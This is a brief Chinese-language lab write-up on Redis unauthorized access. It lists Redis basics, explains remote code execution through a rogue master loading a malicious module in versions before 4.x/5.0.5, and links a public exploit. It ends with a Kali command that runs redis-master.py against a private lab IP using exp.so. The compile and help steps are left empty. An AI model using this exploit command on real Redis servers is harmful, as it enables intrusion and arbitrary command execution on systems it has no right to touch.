基本知識

• Redis非關系型數據庫，
• 默認開放端口是6379端口，
• 配置文件位置為 /etc/redis/redis.conf
• Redis 的數據存于內存中，所以讀寫速度非常快，被廣泛應用于緩存方向
• 高性能的key-value存儲系統
• Redis默認是不需要賬號密碼
  存在未授權訪問漏洞
  

漏洞介紹

Redis未授權訪問在4.x/5.0.5以前版本下，我們可以使用master/slave模式加載遠程模塊，通過動態鏈接庫的方式執行任意命令。

漏洞復現

• exp
  https://github.com/vulhub/redis-rogue-getshell

• 編譯
  

• 查看幫助信息
  

• 利用

┌──(root?kali)-[/home/roott/桌面/redis-rogue-getshell-master]
└─# python3 redis-master.py -r 192.168.1.9 -p 6379 -L 192.168.1.9 -f RedisModulesSDK/exp.so -c "id"